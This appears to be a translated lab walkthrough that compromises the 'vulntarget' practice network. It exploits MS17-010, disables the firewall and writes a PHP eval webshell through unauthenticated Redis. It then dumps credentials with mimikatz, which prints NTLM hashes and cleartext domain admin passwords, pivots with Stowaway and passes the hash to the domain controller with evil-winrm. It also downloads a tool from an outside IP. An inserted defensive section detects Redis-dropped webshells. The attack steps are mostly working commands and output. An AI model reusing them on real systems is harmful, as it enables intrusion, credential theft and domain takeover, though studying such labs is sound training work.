192.168.52.132 is the external (WAN-side) target IP.
Run fscan against it:
```
┌──(root㉿kali)-[~/vulntarget]
└─# ./fscan_amd64 -h 192.168.52.132 -p 1-10000

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.52.132 is alive
[*] Icmp alive hosts len is: 1
192.168.52.132:110 open
192.168.52.132:80 open
192.168.52.132:135 open
192.168.52.132:139 open
192.168.52.132:445 open
192.168.52.132:1188 open
192.168.52.132:3336 open
192.168.52.132:5357 open
192.168.52.132:8750 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo:
[*]192.168.52.132
   [->]win7-PC
   [->]192.168.52.132
   [->]10.0.20.128
[*] WebTitle: http://192.168.52.132:8750 code:403 len:564    title:403 Forbidden
[+] 192.168.52.132	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.52.132:5357 code:503 len:326    title:Service Unavailable
[*] WebTitle: http://192.168.52.132      code:200 len:10065  title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.52.132 [通达OA]
[+] http://192.168.52.132 tongda-user-session-disclosure
[+] http://192.168.52.132:8750 tongda-user-session-disclosure
已完成 9/9
[*] 扫描结束,耗时: 18.303575184s
```
Summarizing what we have so far:

```
192.168.52.132    Tongda OA present and vulnerable; MS17-010; hostname Win7-PC; the usual ports
10.0.20.128       internal address
```

Just go straight at MS17-010:

```
search MS17
use 0
set rhosts 192.168.52.132
run
```

Got a session right away. Start with some information gathering.

```
netsh advfirewall set allprofiles state off
```

This is the command to turn off the firewall. With the firewall on, neither the MSF nor the CS payload manages to connect back.
```
Ethernet adapter �������� 2:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::55ef:46ff:3f4:a6b3%13
   IPv4 Address. . . . . . . . . . . : 10.0.20.128
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter ��������:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::1c54:a862:b6a5:1f6c%11
   IPv4 Address. . . . . . . . . . . : 192.168.52.132
```
Information gathered:

```
192.168.52.132    external address
10.0.20.128       internal address
```

Upload fscan to scan the internal network, and set up a proxy.

```
wget http://101.42.39.110:3389/fscan64.exe
```

Here I used MSF's upload module to push fscan64.exe onto the box:

```
upload fscan64.exe C:\\
```
```
C:\>fscan64.exe -h 10.0.20.0/24 -p 1-10000
fscan64.exe -h 10.0.20.0/24 -p 1-10000

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 10.0.20.128   is alive
(icmp) Target 10.0.20.130   is alive
[*] Icmp alive hosts len is: 2
10.0.20.130:80 open
10.0.20.128:80 open
10.0.20.128:110 open
10.0.20.128:135 open
10.0.20.130:139 open
10.0.20.128:139 open
10.0.20.130:135 open
10.0.20.128:445 open
10.0.20.130:445 open
10.0.20.128:1188 open
10.0.20.128:3336 open
10.0.20.128:5357 open
10.0.20.130:5985 open
10.0.20.130:6379 open
10.0.20.128:8750 open
[*] alive ports len is: 15
start vulscan
[+] 10.0.20.128	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]10.0.20.128
   [->]win7-PC
   [->]192.168.52.132
   [->]10.0.20.128
[*] WebTitle: http://10.0.20.128:8750 code:403 len:564    title:403 Forbidden
[*] WebTitle: http://10.0.20.128      code:200 len:10065  title:通达OA网络智能办公系统
[*] NetInfo:
[*]10.0.20.130
   [->]win2016
   [->]10.0.10.111
   [->]10.0.20.130
[+] Redis:10.0.20.130:6379 unauthorized file:C:\Program Files\Redis/dump.rdb
[*] WebTitle: http://10.0.20.130      code:200 len:11     title:None
[+] InfoScan:http://10.0.20.128 [通达OA]
[*] WebTitle: http://10.0.20.128:5357 code:503 len:326    title:Service Unavailable
[*] NetBios: 10.0.20.130    win2016.vulntarget.com              Windows Server 2016 Datacenter 14393
[*] WebTitle: http://10.0.20.130:5985 code:404 len:315    title:Not Found
[+] http://10.0.20.128 tongda-user-session-disclosure
[+] http://10.0.20.128:8750 tongda-user-session-disclosure
[+] http://10.0.20.128:8750 poc-yaml-tongda-oa-v11.9-api.ali.php-fileupload
已完成 15/15
[*] 扫描结束,耗时: 56.0155853s
```
Summarizing: there are only two IPs in total.

```
10.0.20.128
10.0.20.130    a machine inside the domain
               5985, 6379
               win2016.vulntarget.com    domain: vulntarget.com
               port 6379 allows unauthenticated access
               network addresses of this Win2016 machine: 10.0.20.130, 10.0.10.111
```

Set up a proxy with Stowaway.

Then brute-force directories; a phpinfo.php file turns up.

That gives the web root path. Since Redis allows unauthenticated access, we can just write a shell into it directly:

```
config set dir "C:/phpStudy/PHPTutorial/WWW/"
config set dbfilename 1.php
set 1 "<?php @eval($_POST['1']);?>"
save
```

Written successfully; then connect with AntSword (蚁剑).
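From the defender's side, the trick above leaves a very recognisable artifact: whatever Redis writes with SAVE is an RDB snapshot, so the dropped 1.php starts with the RDB magic rather than with PHP. The following check is an added example (not part of the original writeup); the function names, the temporary web root and both sample files are constructed for the demo.

```python
"""Flag PHP files dropped into a web root by Redis (CONFIG SET dir/dbfilename + SAVE).
A *.php file that starts with the RDB magic "REDIS" is a strong indicator of this abuse."""
import os
import re
import tempfile

RDB_MAGIC = re.compile(rb"^REDIS\d{4}")
# one-liner shells of the kind written via Redis: eval()/assert() fed straight from request input
SHELL_PATTERN = re.compile(
    rb"(eval|assert)\s*\(\s*@?\$_(POST|GET|REQUEST|COOKIE)", re.IGNORECASE)
PHP_EXT = (".php", ".phtml", ".php5", ".inc")


def inspect_file(path):
    """Return the indicator names that fire on one file (empty list if clean)."""
    with open(path, "rb") as fh:
        data = fh.read(1 << 20)  # header and a one-liner fit in the first MiB
    reasons = []
    if RDB_MAGIC.match(data):
        reasons.append("redis-rdb-header")
    if SHELL_PATTERN.search(data):
        reasons.append("eval-from-request")
    return reasons


def scan_webroot(root):
    """Walk a web root; map each suspicious PHP file (relative path) to its indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(PHP_EXT):
                full = os.path.join(dirpath, name)
                if reasons := inspect_file(full):
                    findings[os.path.relpath(full, root).replace(os.sep, "/")] = reasons
    return findings


def build_demo_webroot():
    """Constructed sample: a clean index.php next to a Redis-dropped 1.php."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'hello'; ?>")
    # what SAVE leaves behind: RDB header, binary metadata, then the key's value
    with open(os.path.join(root, "1.php"), "wb") as fh:
        fh.write(b"REDIS0009\xfa\tredis-ver\x055.0.14\xfe\x00\xfb\x01\x00\x00\x011"
                 b"\x1b<?php @eval($_POST['1']);?>\xff" + b"\x00" * 8)
    return root


if __name__ == "__main__":
    for path, why in scan_webroot(build_demo_webroot()).items():
        print(f"{path}: {', '.join(why)}")
```

The RDB-header check is the more robust of the two signals: it fires regardless of how the PHP payload is obfuscated, as long as the file was written through Redis.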
Upload fscan and scan the internal network.

```
IPv4 地址 . . . . . . . . . . . . : 10.0.20.130
子网掩码  . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :

以太网适配器 Ethernet1:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::a195:ff2a:a6da:221c%12
IPv4 地址 . . . . . . . . . . . . : 10.0.10.111
```
But AntSword's terminal is too clumsy to work in; fscan wouldn't run from it, so I switched to Viper.

Session established; start scanning the internal network:

```
fscan64.exe -h 10.0.10.0/24 -p 1-10000
```
```
C:\phpStudy\PHPTutorial\WWW>type result.txt
type result.txt
10.0.10.110:53 open
10.0.10.110:88 open
10.0.10.111:80 open
10.0.10.110:139 open
10.0.10.110:135 open
10.0.10.111:135 open
10.0.10.111:139 open
10.0.10.110:389 open
10.0.10.110:445 open
10.0.10.111:445 open
10.0.10.110:464 open
10.0.10.110:593 open
10.0.10.110:636 open
10.0.10.110:3268 open
10.0.10.110:3269 open
10.0.10.111:5985 open
10.0.10.110:5985 open
10.0.10.111:6379 open
10.0.10.110:9389 open
[+] Redis:10.0.10.111:6379 unauthorized file:C:\phpStudy\PHPTutorial\WWW/1.php
[*] WebTitle: http://10.0.10.111      code:200 len:11     title:None
[*] NetBios: 10.0.10.110    [+]DC VULNTARGET\WIN2019
[*] WebTitle: http://10.0.10.111:5985 code:404 len:315    title:Not Found
[*] NetInfo:
[*]10.0.10.110
   [->]win2019
   [->]10.0.10.110
[*] WebTitle: http://10.0.10.110:5985 code:404 len:315    title:Not Found
```
Found the domain controller.

```
10.0.10.110    DC VULNTARGET\WIN2019
               port 5985 open: WinRM service
```

Gather information on the domain-joined Win2016 machine and look for a way to reach the DC.

Run SharpHound: upload it and run it.

```
SharpHound.exe --CollectionMethods All --Domain vulntarget.com --ExcludeDCs
```

This is the key point: a domain admin has logged on to the Win2016 machine, so credentials were left behind.

We just run mimikatz's logonpasswords:
```
Authentication Id : 0 ; 329364 (00000000:00050694)
Session           : Interactive from 1
User Name         : win2016
Domain            : VULNTARGET
Logon Server      : WIN2019
Logon Time        : 2023/11/11 22:30:17
SID               : S-1-5-21-3795598892-1521228294-2653055093-1601
        msv :
         [00000005] Primary
         * Username   : win2016
         * Domain     : VULNTARGET
         * NTLM       : dfc8d2bfa540a0a6e2248a82322e654e
         * SHA1       : cfa10f59337120a5ea6882b11c1c9f451f5f4ea6
         * DPAPI      : 27bd7cc4802079a6e008ed2d917c4323
        tspkg :
        wdigest :
         * Username   : win2016
         * Domain     : VULNTARGET
         * Password   : (null)
        kerberos :
         * Username   : win2016
         * Domain     : VULNTARGET.COM
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 71684 (00000000:00011804)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/11/11 22:29:13
SID               : S-1-5-90-0-1
        msv :
         [00000005] Primary
         * Username   : WIN2016$
         * Domain     : VULNTARGET
         * NTLM       : e0cd419213811fd910ca6c3c42d764e7
         * SHA1       : cd721f807e68ce07a4d0fe80b9356e93986d5ef1
        tspkg :
        wdigest :
         * Username   : WIN2016$
         * Domain     : VULNTARGET
         * Password   : (null)
        kerberos :
         * Username   : WIN2016$
         * Domain     : vulntarget.com
         * Password   : NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
        ssp :
        credman :

Authentication Id : 0 ; 71573 (00000000:00011795)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/11/11 22:29:13
SID               : S-1-5-90-0-1
        msv :
         [00000005] Primary
         * Username   : WIN2016$
         * Domain     : VULNTARGET
         * NTLM       : 1ee53d0627d3a9c940d6579e3ea1d158
         * SHA1       : 668e4f390b4fa54225f4a12106fbceab3056f83c
        tspkg :
        wdigest :
         * Username   : WIN2016$
         * Domain     : VULNTARGET
         * Password   : (null)
        kerberos :
         * Username   : WIN2016$
         * Domain     : vulntarget.com
         * Password   : 27 7d f9 fa 4a f9 61 25 60 4e 75 42 f7 d9 c6 a0 60 c7 f1 eb 48 b3 73 bf 64 0e dd 5b 92 46 f1 2a cb 7d 19 a4 38 19 aa fb 8a a7 56 ca 40 fb 07 3b f3 c7 d4 ca b7 f3 32 49 56 92 69 78 a0 f4 66 5b 8a 40 46 9e ac 7e dc a7 18 85 68 68 65 d1 b3 1a b3 8b 76 e8 c8 ec 18 58 78 86 10 0e ae 1d 2f b5 ac 9c 29 2c c9 6e d6 eb f3 70 91 fd f4 12 11 e0 8d 48 e4 89 20 73 f4 c0 ae d3 d0 f1 45 e0 be e3 39 6a 8f 7e a4 08 4c a7 41 3d ef 23 ad 19 f4 c1 21 b1 9e 81 39 99 33 d3 8f 83 d6 49 02 59 f7 b9 6d 63 bb 2e 50 be 8f 4e f4 37 7a fa 13 95 93 d6 80 96 c0 d1 7b c6 2c 90 ca 1e 0a da 42 8b 3e 92 c7 65 85 45 41 a4 b6 76 21 35 e2 96 94 a4 07 28 c3 49 d9 31 05 24 28 07 de 8c 64 fa 8d 93 d3 ed ec 4c 75 e5 e1 05 bc 6f 6b 41 ef ed d9 f2 43 a4
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN2016$
Domain            : VULNTARGET
Logon Server      : (null)
Logon Time        : 2023/11/11 22:29:13
SID               : S-1-5-20
        msv :
         [00000005] Primary
         * Username   : WIN2016$
         * Domain     : VULNTARGET
         * NTLM       : 1ee53d0627d3a9c940d6579e3ea1d158
         * SHA1       : 668e4f390b4fa54225f4a12106fbceab3056f83c
        tspkg :
        wdigest :
         * Username   : WIN2016$
         * Domain     : VULNTARGET
         * Password   : (null)
        kerberos :
         * Username   : win2016$
         * Domain     : VULNTARGET.COM
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 41061 (00000000:0000a065)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/11/11 22:29:13
SID               :
        msv :
         [00000005] Primary
         * Username   : WIN2016$
         * Domain     : VULNTARGET
         * NTLM       : 1ee53d0627d3a9c940d6579e3ea1d158
         * SHA1       : 668e4f390b4fa54225f4a12106fbceab3056f83c
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 548857 (00000000:00085ff9)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : VULNTARGET
Logon Server      : WIN2019
Logon Time        : 2023/11/11 22:31:21
SID               : S-1-5-21-3795598892-1521228294-2653055093-500
        msv :
         [00000005] Primary
         * Username   : Administrator
         * Domain     : VULNTARGET
         * NTLM       : c7c654da31ce51cbeecfef99e637be15
         * SHA1       : 20045722851488e55f32110eb0a5222ba793fe2f
         * DPAPI      : 4df31630e621c2278c303c0940d878ff
        tspkg :
        wdigest :
         * Username   : Administrator
         * Domain     : VULNTARGET
         * Password   : (null)
        kerberos :
         * Username   : Administrator
         * Domain     : VULNTARGET.COM
         * Password   : Admin@666
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/11/11 22:29:13
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN2016$
Domain            : VULNTARGET
Logon Server      : (null)
Logon Time        : 2023/11/11 22:29:13
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username   : WIN2016$
         * Domain     : VULNTARGET
         * Password   : (null)
        kerberos :
         * Username   : win2016$
         * Domain     : VULNTARGET.COM
         * Password   : (null)
        ssp :
        credman :
```
Then I picked out the domain admin's hash:

```
[00000005] Primary
 * Username   : Administrator
 * Domain     : VULNTARGET
 * NTLM       : c7c654da31ce51cbeecfef99e637be15
 * SHA1       : 20045722851488e55f32110eb0a5222ba793fe2f
 * DPAPI      : 4df31630e621c2278c303c0940d878ff
```

Since the domain admin sits on the 10.x segment, a second-hop proxy is needed.

Stowaway: https://www.freebuf.com/sectool/359841.html

Open another listening port on the Win7 machine.

Then connect to that port from the Win2016 machine:

```
agent.exe -c 10.0.20.128:1235
```

Then add one more rule in Proxifier.

And add this one entry to the proxychains config file.

Since we have the domain admin's hash, we can just log in with evil-winrm:

```
proxychains evil-winrm -i 10.0.10.110 -u Administrator -H "c7c654da31ce51cbeecfef99e637be15"
```

Got it.
Finally, how to turn on port 3389 when RDP isn't enabled:

```
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
```

You only have the privileges for this after taking the domain controller.

(I didn't get this to work; saving it here, it may come in handy later.)

The error was at the second step.

Command to turn off the firewall:

```
netsh advfirewall set allprofiles state off
```

The new thing I learned here is the second-hop proxy.

Viper can also be brought in over the second-hop proxy, but one thing to note: the firewall has to be turned off.

```
netsh advfirewall set allprofiles state off
```